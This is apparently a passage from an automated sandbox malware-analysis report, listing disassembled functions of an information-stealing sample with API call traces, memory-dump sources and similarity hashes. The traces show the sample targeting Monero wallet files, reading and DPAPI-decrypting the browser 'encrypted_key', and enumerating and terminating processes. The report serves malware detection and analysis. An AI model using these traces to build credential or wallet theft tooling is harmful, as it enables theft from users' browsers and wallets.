                                  • Part of subcall function 00EB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EB8FE2
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00EC1678,00EC0D93), ref: 00EAF64C
                                • lstrlen.KERNEL32(00000000), ref: 00EAF66B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: 6f013c661a7782936a055b8dfbe63a8af1e48ee37b534a7039aaaa92728904fe
                                • Instruction ID: 70dd9f51d8c1918ddd090074c4fae3ca38d4e53ed59dd03b05cbb0f63597b38f
                                • Opcode Fuzzy Hash: 6f013c661a7782936a055b8dfbe63a8af1e48ee37b534a7039aaaa92728904fe
                                • Instruction Fuzzy Hash: C351EF72D10208ABCF04FBA4DDA6DEE77B9AF54300F489578F41677191EE346A09CB62
                                Function 00EB37B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 924a270fe538d3067ee28e35c928dbbefd0a49fefa1d63a6b2b7b12d9c541a04
                                • Instruction ID: 6ae37904057e764ad907a277eef259de91af596d029b21bf5fc99d66770a97be
                                • Opcode Fuzzy Hash: 924a270fe538d3067ee28e35c928dbbefd0a49fefa1d63a6b2b7b12d9c541a04
                                • Instruction Fuzzy Hash: E1414271D10209EBCF14EFA4D956EEFB7B8AF44304F049428F51576285EB709A45CFA1
                                Function 00EAA430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EAA13C
                                  • Part of subcall function 00EAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EAA161
                                  • Part of subcall function 00EAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00EAA181
                                  • Part of subcall function 00EAA110: ReadFile.KERNEL32(000000FF,?,00000000,00EA148F,00000000), ref: 00EAA1AA
                                  • Part of subcall function 00EAA110: LocalFree.KERNEL32(00EA148F), ref: 00EAA1E0
                                  • Part of subcall function 00EAA110: CloseHandle.KERNEL32(000000FF), ref: 00EAA1EA
                                  • Part of subcall function 00EB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EB8FE2
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EAA489
                                  • Part of subcall function 00EAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00EAA23F
                                  • Part of subcall function 00EAA210: LocalAlloc.KERNEL32(00000040,?,?,?,00EA4F3E,00000000,?), ref: 00EAA251
                                  • Part of subcall function 00EAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00EAA27A
                                  • Part of subcall function 00EAA210: LocalFree.KERNEL32(?,?,?,?,00EA4F3E,00000000,?), ref: 00EAA28F
                                  • Part of subcall function 00EAA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EAA2D4
                                  • Part of subcall function 00EAA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00EAA2F3
                                  • Part of subcall function 00EAA2B0: LocalFree.KERNEL32(?), ref: 00EAA323
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 5b359c6e73ef36f286bfb40ccc922ae9322b75ad4a970a3b420ce34c3b688ccc
                                • Instruction ID: 60303df6729c80d6899ed63d4d2992f46cdec3b23d41eb11564a7c3623cd276d
                                • Opcode Fuzzy Hash: 5b359c6e73ef36f286bfb40ccc922ae9322b75ad4a970a3b420ce34c3b688ccc
                                • Instruction Fuzzy Hash: 8A3161B6D00208ABCF04DBE4DD55EEFB3B8AF59304F085568E911B7241E731AE05CBA6
                                Function 00EB9660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00EB967B
                                  • Part of subcall function 00EB8EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00EB96AE,00000000), ref: 00EB8EEB
                                  • Part of subcall function 00EB8EE0: RtlAllocateHeap.NTDLL(00000000), ref: 00EB8EF2
                                  • Part of subcall function 00EB8EE0: wsprintfW.USER32 ref: 00EB8F08
                                • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00EB973B
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EB9759
                                • CloseHandle.KERNEL32(00000000), ref: 00EB9766
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                • String ID:
                                • API String ID: 3729781310-0
                                • Opcode ID: 365c962a55604d5166bb3d1a7aeaa71e258e096d9c9c1c4dc80f70e6575c3864
                                • Instruction ID: 5e7ac33808d0ce2c1d9b409d728b34690b4e8c48f924eef0ca11bcd0d56ee047
                                • Opcode Fuzzy Hash: 365c962a55604d5166bb3d1a7aeaa71e258e096d9c9c1c4dc80f70e6575c3864
                                • Instruction Fuzzy Hash: FA317E75A00218ABDF14DFE0DD49BEEB7B8FB04700F204469F606AB288DB746A84CB51
                                Function 00EB8810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00EC05BF), ref: 00EB885A
                                • Process32First.KERNEL32(?,00000128), ref: 00EB886E
                                • Process32Next.KERNEL32(?,00000128), ref: 00EB8883
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • CloseHandle.KERNEL32(?), ref: 00EB88F1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: d137c8ec4dda4db4ea310b8920615c29f955d79765d6c36f32f862eec9324be1
                                • Instruction ID: 0af990870f6d7a02859a49acec96cc6c13c078e757fbf8faa155fcaf164b5ea6
                                • Opcode Fuzzy Hash: d137c8ec4dda4db4ea310b8920615c29f955d79765d6c36f32f862eec9324be1
                                • Instruction Fuzzy Hash: 2B313C71901218ABCF28DB94DD95FEFB7B9EB44700F5451A9F11AB2290EB306A44CFA1
                                Function 00F1FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F1FE13
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F1FE2C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Value___vcrt_
                                • String ID:
                                • API String ID: 1426506684-0
                                • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                • Instruction ID: 3856d1a519234f110fe50cc6a5c21db12153e70b3802f20d194cc9975d0ee5ee
                                • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                • Instruction Fuzzy Hash: 8201D432609731EEFA3466B4ACC9AAB3694FB117B57344339F116801F2EF564C85B284
                                Function 00EB7B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EC0DE8,00000000,?), ref: 00EB7B40
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB7B47
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00EC0DE8,00000000,?), ref: 00EB7B54
                                • wsprintfA.USER32 ref: 00EB7B83
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 6ed0895e54bb5bddeb03f7169ff661c1efed842079ce0b50573fd903f66a235f
                                • Instruction ID: 898f91b18777863cd594733655079e2c56098266cfc05ac4c569a85358c44caa
                                • Opcode Fuzzy Hash: 6ed0895e54bb5bddeb03f7169ff661c1efed842079ce0b50573fd903f66a235f
                                • Instruction Fuzzy Hash: 94112AB2904218ABCB14DBC9DD49BFFB7B8FB4CB11F10412AF615A2284E6395940C7B0
                                Function 00EBCA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 00EBCA7E
                                  • Part of subcall function 00EBC2A0: __amsg_exit.LIBCMT ref: 00EBC2B0
                                • __getptd.LIBCMT ref: 00EBCA95
                                • __amsg_exit.LIBCMT ref: 00EBCAA3
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00EBCAC7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 6f4c4dbdf459ab8c9a45b0d61f871209dcd60c0d5e2f65c82713533d6357e862
                                • Instruction ID: bc5b74d1dbf24c103e3fda7301c04bed4fc26fa602de31189017498a0299994e
                                • Opcode Fuzzy Hash: 6f4c4dbdf459ab8c9a45b0d61f871209dcd60c0d5e2f65c82713533d6357e862
                                • Instruction Fuzzy Hash: 85F090329487189BD624FBA89803BCF37E0AF00724F30314AF506B62E2CBA459418AD6
                                Function 00F204D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Catch
                                • String ID: MOC$RCC
                                • API String ID: 78271584-2084237596
                                • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                • Instruction ID: 28789ed646d8bd9ef8b467aebecb5e8139e951bec3565f64b642d9f41dfb3fcf
                                • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                • Instruction Fuzzy Hash: 9C415B72D00219AFDF15DF94ED82AEE7BB5FF48314F184059F90466212D7399990EF50
                                Function 00EB5190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EB8F9B
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB51CA
                                • lstrcat.KERNEL32(?,00EC1058), ref: 00EB51E7
                                • lstrcat.KERNEL32(?,01BF9FD8), ref: 00EB51FB
                                • lstrcat.KERNEL32(?,00EC105C), ref: 00EB520D
                                  • Part of subcall function 00EB4B60: wsprintfA.USER32 ref: 00EB4B7C
                                  • Part of subcall function 00EB4B60: FindFirstFileA.KERNEL32(?,?), ref: 00EB4B93
                                  • Part of subcall function 00EB4B60: StrCmpCA.SHLWAPI(?,00EC0FC4), ref: 00EB4BC1
                                  • Part of subcall function 00EB4B60: StrCmpCA.SHLWAPI(?,00EC0FC8), ref: 00EB4BD7
                                  • Part of subcall function 00EB4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00EB4DCD
                                  • Part of subcall function 00EB4B60: FindClose.KERNEL32(000000FF), ref: 00EB4DE2
                                Memory Dump Source
